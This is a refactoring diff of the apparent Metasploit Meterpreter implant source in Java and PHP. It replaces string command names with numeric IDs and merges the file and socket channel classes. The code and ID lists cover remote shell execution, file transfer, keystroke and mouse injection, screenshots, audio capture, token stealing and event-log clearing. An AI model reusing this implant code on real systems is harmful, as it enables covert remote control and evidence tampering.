     public static File expand(String path) {
         File result = new File(path);
-        if (!result.isAbsolute())
+        if (!result.isAbsolute()) {
-            result = new File(cwd, path);
+            result = new File(getCWD(), path);
+        }
         return result;
     }
 
+    public static void setCWD(File newCWD) {
+        cwd = newCWD;
+    }
+
     public void load(CommandManager mgr) throws Exception {
-        cwd = new File(".").getCanonicalFile();
+        mgr.registerCommand(CommandId.CORE_CHANNEL_OPEN, stdapi_channel_open.class);
-        mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_CHDIR, stdapi_fs_chdir.class);
-        mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_DELETE_DIR, stdapi_fs_delete_dir.class);
-        mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_DELETE_FILE, stdapi_fs_delete_file.class);
-        mgr.registerCommand("channel_create_stdapi_net_udp_client", channel_create_stdapi_net_udp_client.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_EXPAND_PATH, stdapi_fs_file_expand_path.class, V1_2, V1_5); // %COMSPEC% only
-        mgr.registerCommand("stdapi_fs_chdir", stdapi_fs_chdir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_MOVE, stdapi_fs_file_move.class);
-        mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_FILE_COPY, stdapi_fs_file_copy.class);
-        mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_GETWD, stdapi_fs_getwd.class);
-        mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path.class, V1_2, V1_5); // %COMSPEC% only
+        mgr.registerCommand(CommandId.STDAPI_FS_LS, stdapi_fs_ls.class);
-        mgr.registerCommand("stdapi_fs_file_move", stdapi_fs_file_move.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_MKDIR, stdapi_fs_mkdir.class);
-        mgr.registerCommand("stdapi_fs_file_copy", stdapi_fs_file_copy.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_MD5, stdapi_fs_md5.class);
-        mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SEARCH, stdapi_fs_search.class);
-        mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SEPARATOR, stdapi_fs_separator.class);
-        mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_STAT, stdapi_fs_stat.class, V1_2, V1_6);
-        mgr.registerCommand("stdapi_fs_md5", stdapi_fs_md5.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_SHA1, stdapi_fs_sha1.class);
-        mgr.registerCommand("stdapi_fs_search", stdapi_fs_search.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_INTERFACES, stdapi_net_config_get_interfaces.class, V1_4, V1_6);
-        mgr.registerCommand("stdapi_fs_separator", stdapi_fs_separator.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_ROUTES, stdapi_net_config_get_routes.class, V1_4);
-        mgr.registerCommand("stdapi_fs_stat", stdapi_fs_stat.class, V1_2, V1_6);
+        mgr.registerCommand(CommandId.STDAPI_NET_SOCKET_TCP_SHUTDOWN, stdapi_net_socket_tcp_shutdown.class, V1_2, V1_3);
-        mgr.registerCommand("stdapi_fs_sha1", stdapi_fs_sha1.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_GETUID, stdapi_sys_config_getuid.class);
-        mgr.registerCommand("stdapi_net_config_get_interfaces", stdapi_net_config_get_interfaces.class, V1_4, V1_6);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_GETENV, stdapi_sys_config_getenv.class);
-        mgr.registerCommand("stdapi_net_config_get_routes", stdapi_net_config_get_routes.class, V1_4);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_SYSINFO, stdapi_sys_config_sysinfo.class);
-        mgr.registerCommand("stdapi_net_socket_tcp_shutdown", stdapi_net_socket_tcp_shutdown.class, V1_2, V1_3);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_LOCALTIME, stdapi_sys_config_localtime.class);
-        mgr.registerCommand("stdapi_sys_config_getuid", stdapi_sys_config_getuid.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_EXECUTE, stdapi_sys_process_execute.class, V1_2, V1_3);
-        mgr.registerCommand("stdapi_sys_config_getenv", stdapi_sys_config_getenv.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_CLOSE, stdapi_sys_process_close.class);
-        mgr.registerCommand("stdapi_sys_config_sysinfo", stdapi_sys_config_sysinfo.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GET_PROCESSES, stdapi_sys_process_get_processes.class, V1_2);
-        mgr.registerCommand("stdapi_sys_config_localtime", stdapi_sys_config_localtime.class);
+        mgr.registerCommand(CommandId.STDAPI_UI_DESKTOP_SCREENSHOT, stdapi_ui_desktop_screenshot.class, V1_4);
-        mgr.registerCommand("stdapi_sys_process_execute", stdapi_sys_process_execute.class, V1_2, V1_3);
+        mgr.registerCommand(CommandId.STDAPI_UI_SEND_MOUSE, stdapi_ui_send_mouse.class, V1_4);
-        mgr.registerCommand("stdapi_sys_process_close", stdapi_sys_process_close.class);
+        mgr.registerCommand(CommandId.STDAPI_UI_SEND_KEYEVENT, stdapi_ui_send_keyevent.class, V1_4);
-        mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes.class, V1_2);
+        mgr.registerCommand(CommandId.STDAPI_WEBCAM_AUDIO_RECORD, stdapi_webcam_audio_record.class, V1_4);
-        mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class, V1_4);
-        mgr.registerCommand("stdapi_ui_send_mouse", stdapi_ui_send_mouse.class, V1_4);
-        mgr.registerCommand("stdapi_ui_send_keyevent", stdapi_ui_send_keyevent.class, V1_4);
-        mgr.registerCommand("webcam_audio_record", webcam_audio_record.class, V1_4);
     }
 }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/channel_create_stdapi_fs_file.java

@@ -1,40 +0,0 @@
-package com.metasploit.meterpreter.stdapi;
-
-import java.io.ByteArrayInputStream;
-import java.io.FileInputStream;
-import java.io.FileOutputStream;
-
-import com.metasploit.meterpreter.Channel;
-import com.metasploit.meterpreter.Meterpreter;
-import com.metasploit.meterpreter.TLVPacket;
-import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.command.Command;
-import com.metasploit.meterpreter.command.NotYetImplementedCommand;
-
-public class channel_create_stdapi_fs_file implements Command {
-
-    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        String fpath = request.getStringValue(TLVType.TLV_TYPE_FILE_PATH);
-        String mode = request.getStringValue(TLVType.TLV_TYPE_FILE_MODE, "rb");
-        Channel channel;
-        if (mode.equals("r") || mode.equals("rb") || mode.equals("rbb")) {
-            channel = null;
-            if (fpath.equals("...")) {
-                byte[] data = meterpreter.getErrorBuffer();
-                if (data != null)
-                    channel = new Channel(meterpreter, new ByteArrayInputStream(data), null);
-            }
-            if (channel == null)
-                channel = new Channel(meterpreter, new FileInputStream(Loader.expand(fpath)), null);
-        } else if (mode.equals("r") || mode.equals("wb") || mode.equals("wbb")) {
-            channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), false));
-        } else if (mode.equals("a") || mode.equals("ab") || mode.equals("abb")) {
-            channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), true));
-        } else {
-            NotYetImplementedCommand.INSTANCE.execute(meterpreter, request, response);
-            throw new IllegalArgumentException("Unsupported file mode: " + mode);
-        }
-        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
-        return ERROR_SUCCESS;
-    }
-}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/channel_create_stdapi_net_tcp_client.java

@@ -1,43 +0,0 @@
-package com.metasploit.meterpreter.stdapi;
-
-import java.net.ConnectException;
-import java.net.InetAddress;
-import java.net.Socket;
-
-import com.metasploit.meterpreter.Channel;
-import com.metasploit.meterpreter.Meterpreter;
-import com.metasploit.meterpreter.SocketChannel;
-import com.metasploit.meterpreter.TLVPacket;
-import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.command.Command;
-
-public class channel_create_stdapi_net_tcp_client implements Command {
-
-    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        String peerHost = request.getStringValue(TLVType.TLV_TYPE_PEER_HOST);
-        int peerPort = request.getIntValue(TLVType.TLV_TYPE_PEER_PORT);
-        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
-        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
-        int retries = ((Integer) request.getValue(TLVType.TLV_TYPE_CONNECT_RETRIES, new Integer(1))).intValue();
-        if (retries < 1)
-            retries = 1;
-        InetAddress peerAddr = InetAddress.getByName(peerHost);
-        InetAddress localAddr = InetAddress.getByName(localHost);
-        Socket socket = null;
-        for (int i = 0; i < retries; i++) {
-            try {
-                socket = new Socket(peerAddr, peerPort, localAddr, localPort);
-                break;
-            } catch (ConnectException ex) {
-                if (i == retries - 1)
-                    throw ex;
-            }
-        }
-
-        // If we got here, the connection worked, respond with the new channel ID
-        Channel channel = new SocketChannel(meterpreter, socket);
-        channel.startInteract();
-        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
-        return ERROR_SUCCESS;
-    }
-}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/channel_create_stdapi_net_tcp_server.java

@@ -1,27 +0,0 @@
-package com.metasploit.meterpreter.stdapi;
-
-import java.net.InetAddress;
-import java.net.ServerSocket;
-
-import com.metasploit.meterpreter.Channel;
-import com.metasploit.meterpreter.Meterpreter;
-import com.metasploit.meterpreter.ServerSocketChannel;
-import com.metasploit.meterpreter.TLVPacket;
-import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.command.Command;
-
-public class channel_create_stdapi_net_tcp_server implements Command {
-
-    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
-        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
-        ServerSocket ss;
-        if (localHost.equals("0.0.0.0"))
-            ss = new ServerSocket(localPort);
-        else
-            ss = new ServerSocket(localPort, 50, InetAddress.getByName(localHost));
-        Channel channel = new ServerSocketChannel(meterpreter, ss);
-        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
-        return ERROR_SUCCESS;
-    }
-}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/channel_create_stdapi_net_udp_client.java

@@ -1,31 +0,0 @@
-package com.metasploit.meterpreter.stdapi;
-
-import java.net.DatagramSocket;
-import java.net.InetAddress;
-
-import com.metasploit.meterpreter.Channel;
-import com.metasploit.meterpreter.DatagramSocketChannel;
-import com.metasploit.meterpreter.Meterpreter;
-import com.metasploit.meterpreter.TLVPacket;
-import com.metasploit.meterpreter.TLVType;
-import com.metasploit.meterpreter.command.Command;
-
-public class channel_create_stdapi_net_udp_client implements Command {
-
-    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-
-        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
-        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
-        String peerHost = request.getStringValue(TLVType.TLV_TYPE_PEER_HOST);
-        int peerPort = request.getIntValue(TLVType.TLV_TYPE_PEER_PORT);
-
-        DatagramSocket ds = new DatagramSocket(localPort, InetAddress.getByName(localHost));
-        if (peerPort != 0) {
-            ds.connect(InetAddress.getByName(peerHost), peerPort);
-        }
-        Channel channel = new DatagramSocketChannel(meterpreter, ds);
-        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
-        return ERROR_SUCCESS;
-    }
-
-}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_channel_open.java

@@ -0,0 +1,120 @@
+package com.metasploit.meterpreter.stdapi;
+
+import java.net.ConnectException;
+import java.net.DatagramSocket;
+import java.net.InetAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+
+import java.io.ByteArrayInputStream;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+
+import com.metasploit.meterpreter.Channel;
+import com.metasploit.meterpreter.DatagramSocketChannel;
+import com.metasploit.meterpreter.ServerSocketChannel;
+import com.metasploit.meterpreter.SocketChannel;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.command.NotYetImplementedCommand;
+
+public class stdapi_channel_open implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String channelType = request.getStringValue(TLVType.TLV_TYPE_CHANNEL_TYPE);
+        if (channelType.equals("stdapi_fs_file")) {
+            return executeFsFile(meterpreter, request, response);
+        }
+        if (channelType.equals("stdapi_net_tcp_client")) {
+            return executeTcpClient(meterpreter, request, response);
+        }
+        if (channelType.equals("stdapi_net_tcp_server")) {
+            return executeTcpServer(meterpreter, request, response);
+        }
+        return ERROR_FAILURE;
+    }
+
+    private int executeFsFile(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String fpath = request.getStringValue(TLVType.TLV_TYPE_FILE_PATH);
+        String mode = request.getStringValue(TLVType.TLV_TYPE_FILE_MODE, "rb");
+        Channel channel;
+        if (mode.equals("r") || mode.equals("rb") || mode.equals("rbb")) {
+            channel = null;
+            if (fpath.equals("...")) {
+                byte[] data = meterpreter.getErrorBuffer();
+                if (data != null)
+                    channel = new Channel(meterpreter, new ByteArrayInputStream(data), null);
+            }
+            if (channel == null)
+                channel = new Channel(meterpreter, new FileInputStream(Loader.expand(fpath)), null);
+        } else if (mode.equals("r") || mode.equals("wb") || mode.equals("wbb")) {
+            channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), false));
+        } else if (mode.equals("a") || mode.equals("ab") || mode.equals("abb")) {
+            channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), true));
+        } else {
+            NotYetImplementedCommand.INSTANCE.execute(meterpreter, request, response);
+            throw new IllegalArgumentException("Unsupported file mode: " + mode);
+        }
+        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
+        return ERROR_SUCCESS;
+    }
+
+    private int executeUdpClient(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+
+        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
+        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
+        String peerHost = request.getStringValue(TLVType.TLV_TYPE_PEER_HOST);
+        int peerPort = request.getIntValue(TLVType.TLV_TYPE_PEER_PORT);
+
+        DatagramSocket ds = new DatagramSocket(localPort, InetAddress.getByName(localHost));
+        if (peerPort != 0) {
+            ds.connect(InetAddress.getByName(peerHost), peerPort);
+        }
+        Channel channel = new DatagramSocketChannel(meterpreter, ds);
+        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
+        return ERROR_SUCCESS;
+    }
+
+    private int executeTcpServer(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
+        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
+        ServerSocket ss;
+        if (localHost.equals("0.0.0.0"))
+            ss = new ServerSocket(localPort);
+        else
+            ss = new ServerSocket(localPort, 50, InetAddress.getByName(localHost));
+        Channel channel = new ServerSocketChannel(meterpreter, ss);
+        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
+        return ERROR_SUCCESS;
+    }
+
+    private int executeTcpClient(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String peerHost = request.getStringValue(TLVType.TLV_TYPE_PEER_HOST);
+        int peerPort = request.getIntValue(TLVType.TLV_TYPE_PEER_PORT);
+        String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
+        int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
+        int retries = ((Integer) request.getValue(TLVType.TLV_TYPE_CONNECT_RETRIES, new Integer(1))).intValue();
+        if (retries < 1)
+            retries = 1;
+        InetAddress peerAddr = InetAddress.getByName(peerHost);
+        InetAddress localAddr = InetAddress.getByName(localHost);
+        Socket socket = null;
+        for (int i = 0; i < retries; i++) {
+            try {
+                socket = new Socket(peerAddr, peerPort, localAddr, localPort);
+                break;
+            } catch (ConnectException ex) {
+                if (i == retries - 1)
+                    throw ex;
+            }
+        }
+
+        // If we got here, the connection worked, respond with the new channel ID
+        Channel channel = new SocketChannel(meterpreter, socket);
+        channel.startInteract();
+        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
+        return ERROR_SUCCESS;
+    }
+}

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_chdir.java

@@ -16,7 +16,7 @@ public class stdapi_fs_chdir implements Command {
         if (!f.exists() || !f.isDirectory()) {
             throw new IOException("Path not found: " + path);
         }
-        Loader.cwd = f.getCanonicalFile();
+        Loader.setCWD(f.getCanonicalFile());
         return ERROR_SUCCESS;
     }
 }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_getwd.java

@@ -8,7 +8,7 @@ import com.metasploit.meterpreter.command.Command;
 public class stdapi_fs_getwd implements Command {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        response.add(TLVType.TLV_TYPE_DIRECTORY_PATH, Loader.cwd.getAbsolutePath());
+        response.add(TLVType.TLV_TYPE_DIRECTORY_PATH, Loader.getCWD().getAbsolutePath());
         return ERROR_SUCCESS;
     }
 }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_ls.java

@@ -7,11 +7,12 @@ import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.TLVType;
 import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.command.CommandId;
 
 public class stdapi_fs_ls implements Command {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        stdapi_fs_stat statCommand = (stdapi_fs_stat) meterpreter.getCommandManager().getCommand("stdapi_fs_stat");
+        stdapi_fs_stat statCommand = (stdapi_fs_stat) meterpreter.getCommandManager().getCommand(CommandId.STDAPI_FS_STAT);
         String pathString = request.getStringValue(TLVType.TLV_TYPE_DIRECTORY_PATH);
         File path = Loader.expand(pathString);
         if (pathString.contains("*")) {

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_routes_V1_4.java

@@ -7,11 +7,12 @@ import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.TLVType;
 import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.command.CommandId;
 
 public class stdapi_net_config_get_routes_V1_4 extends stdapi_net_config_get_routes implements Command {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        stdapi_net_config_get_interfaces_V1_4 getIfaceCommand = (stdapi_net_config_get_interfaces_V1_4) meterpreter.getCommandManager().getCommand("stdapi_net_config_get_interfaces");
+        stdapi_net_config_get_interfaces_V1_4 getIfaceCommand = (stdapi_net_config_get_interfaces_V1_4) meterpreter.getCommandManager().getCommand(CommandId.STDAPI_NET_CONFIG_GET_INTERFACES);
         for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements(); ) {
             NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
             stdapi_net_config_get_interfaces_V1_4.Address[] addresses = getIfaceCommand.getAddresses(iface);

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_execute_V1_3.java

@@ -9,7 +9,7 @@ public class stdapi_sys_process_execute_V1_3 extends stdapi_sys_process_execute
         if (System.getProperty("os.name").toLowerCase().contains("windows")) {
             return super.execute(cmdstr);
         }
-        Process process = Runtime.getRuntime().exec(new String[]{"sh", "-c", cmdstr}, null, Loader.cwd);
+        Process process = Runtime.getRuntime().exec(new String[]{"sh", "-c", cmdstr}, null, Loader.getCWD());
         return process;
     }
 

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_webcam_audio_record.java

@@ -1,5 +1,5 @@
 package com.metasploit.meterpreter.stdapi;
 
 //Dummy class
-public class webcam_audio_record {
+public class stdapi_webcam_audio_record {
 }

java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_webcam_audio_record_V1_4.java

@@ -17,7 +17,7 @@ import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.command.Command;
 import com.sun.media.sound.WaveFileWriter;
 
-public class webcam_audio_record_V1_4 extends webcam_audio_record implements Command {
+public class stdapi_webcam_audio_record_V1_4 extends stdapi_webcam_audio_record implements Command {
 
     private static final int TLV_EXTENSIONS = 20000;
     private static final int TLV_TYPE_AUDIO_DURATION = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1);

java/version-compatibility-check/java16/pom.xml

@@ -31,7 +31,7 @@
 									<fileset dir="${project.basedir}/../../meterpreter/meterpreter/src/main/java" includes="**/*.java"/>
 									<fileset dir="${project.basedir}/../../meterpreter/shared/src/main/java" includes="**/*.java"/>
 									<!-- Webcam_audio_record_V1_4 depends on Sun proprietary API -->
-									<fileset dir="${project.basedir}/../../meterpreter/meterpreter/target/extension-src" includes="**/*.java" excludes="**/webcam_audio_record_V1_4.java" />
+									<fileset dir="${project.basedir}/../../meterpreter/meterpreter/target/extension-src" includes="**/*.java" excludes="**/stdapi_webcam_audio_record_V1_4.java" />
 								</copy>
 							</target>
 						</configuration>

php/meterpreter/ext_server_stdapi.php

@@ -162,6 +162,130 @@ define("TLV_TYPE_EVENT_DATA",          TLV_META_TYPE_RAW     | 4013);
 define("TLV_TYPE_POWER_FLAGS",         TLV_META_TYPE_UINT    | 4100);
 define("TLV_TYPE_POWER_REASON",        TLV_META_TYPE_UINT    | 4101);
 
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-05-01 05:33:39 UTC
+# IDs for stdapi
+define('EXTENSION_ID_STDAPI', 1000);
+define('COMMAND_ID_STDAPI_FS_CHDIR', 1001);
+define('COMMAND_ID_STDAPI_FS_CHMOD', 1002);
+define('COMMAND_ID_STDAPI_FS_DELETE_DIR', 1003);
+define('COMMAND_ID_STDAPI_FS_DELETE_FILE', 1004);
+define('COMMAND_ID_STDAPI_FS_FILE_COPY', 1005);
+define('COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH', 1006);
+define('COMMAND_ID_STDAPI_FS_FILE_MOVE', 1007);
+define('COMMAND_ID_STDAPI_FS_GETWD', 1008);
+define('COMMAND_ID_STDAPI_FS_LS', 1009);
+define('COMMAND_ID_STDAPI_FS_MD5', 1010);
+define('COMMAND_ID_STDAPI_FS_MKDIR', 1011);
+define('COMMAND_ID_STDAPI_FS_MOUNT_SHOW', 1012);
+define('COMMAND_ID_STDAPI_FS_SEARCH', 1013);
+define('COMMAND_ID_STDAPI_FS_SEPARATOR', 1014);
+define('COMMAND_ID_STDAPI_FS_SHA1', 1015);
+define('COMMAND_ID_STDAPI_FS_STAT', 1016);
+define('COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE', 1017);
+define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE', 1018);
+define('COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES', 1019);
+define('COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT', 1020);
+define('COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY', 1021);
+define('COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES', 1022);
+define('COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE', 1023);
+define('COMMAND_ID_STDAPI_NET_RESOLVE_HOST', 1024);
+define('COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS', 1025);
+define('COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN', 1026);
+define('COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN', 1027);
+define('COMMAND_ID_STDAPI_RAILGUN_API', 1028);
+define('COMMAND_ID_STDAPI_RAILGUN_API_MULTI', 1029);
+define('COMMAND_ID_STDAPI_RAILGUN_MEMREAD', 1030);
+define('COMMAND_ID_STDAPI_RAILGUN_MEMWRITE', 1031);
+define('COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS', 1032);
+define('COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY', 1033);
+define('COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY', 1034);
+define('COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY', 1035);
+define('COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE', 1036);
+define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY', 1037);
+define('COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT', 1038);
+define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE', 1039);
+define('COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT', 1040);
+define('COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY', 1041);
+define('COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY', 1042);
+define('COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY', 1043);
+define('COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS', 1044);
+define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE', 1045);
+define('COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT', 1046);
+define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE', 1047);
+define('COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT', 1048);
+define('COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY', 1049);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST', 1050);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN', 1051);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_GETENV', 1052);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS', 1053);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_GETSID', 1054);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_GETUID', 1055);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME', 1056);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF', 1057);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN', 1058);
+define('COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO', 1059);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR', 1060);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE', 1061);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS', 1062);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST', 1063);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN', 1064);
+define('COMMAND_ID_STDAPI_SYS_EVENTLOG_READ', 1065);
+define('COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS', 1066);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH', 1067);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE', 1068);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE', 1069);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO', 1070);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES', 1071);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_GETPID', 1072);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES', 1073);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS', 1074);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD', 1075);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD', 1076);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_KILL', 1077);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE', 1078);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE', 1079);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK', 1080);
+define('COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT', 1081);
